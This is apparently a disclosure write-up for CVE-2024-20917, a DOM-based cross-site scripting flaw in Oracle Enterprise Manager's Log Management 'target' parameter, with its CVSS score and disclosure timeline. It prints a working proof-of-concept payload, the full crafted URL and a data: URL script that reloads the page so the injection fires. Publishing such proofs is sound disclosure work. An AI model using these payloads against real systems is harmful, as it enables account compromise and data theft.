CVE-2024-20917
DOM-Based Cross Site Scripting in the `target` parameter in the Log Management component
7.5 (High)
CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:L/A:L
Oracle Enterprise Manager
13.5.0.14
Patryk Rejchert and Piotr Konopko
A DOM-Based Cross Site Scripting vulnerability exists in the `target` GET parameter of the Log Management component of the Oracle Enterprise Manager Base Platform 13.5.0.0 version. This vulnerability allows an unauthenticated attacker with network access via HTTP to compromise the OEM Base Platform. A specially crafted URL can trigger a XSS attack, requiring the victim to interact by clicking on the malicious link. This can result in the modification or exfiltration of data from the affected application.
While testing the vulnerability, it turned out that the message containing the injected code did not always show up. In order to make the vulnerability work, the parameter value should be modified to something other than the previous one.
In order to reproduce the vulnerability, the following payload should be placed in the `target` parameter:
%27-alert(%27XSS%27)-%27
The whole URL will look like this:
https://<host>/em/faces/logmgmt/msgs/logMessages?type=j2ee_application_domain&target=%27-alert(%27XSS%27)-%27
The problem of messages containing injected code not always showing up can be solved by writing a script that modifies the parameter value after the page opens.
data:text/html,<script>addEventListener('click', () => {x = open("https://<host>/em/faces/logmgmt/msgs/logMessages?type=j2ee_application_domain&target='-alert(document.domain)-'"); setTimeout(()=>{x.location="https://<host>/em/faces/logmgmt/msgs/logMessages?type=j2ee_application_domain&target='-alert(document.domain)-'a"},2000)});</script>
However, this solution requires an additional click on the page with the script.
- 12-06-2023 - Vulnerability reported to vendor
- 16-01-2024 - Security advisory is published by the vendor
- 30-09-2025 - PoC published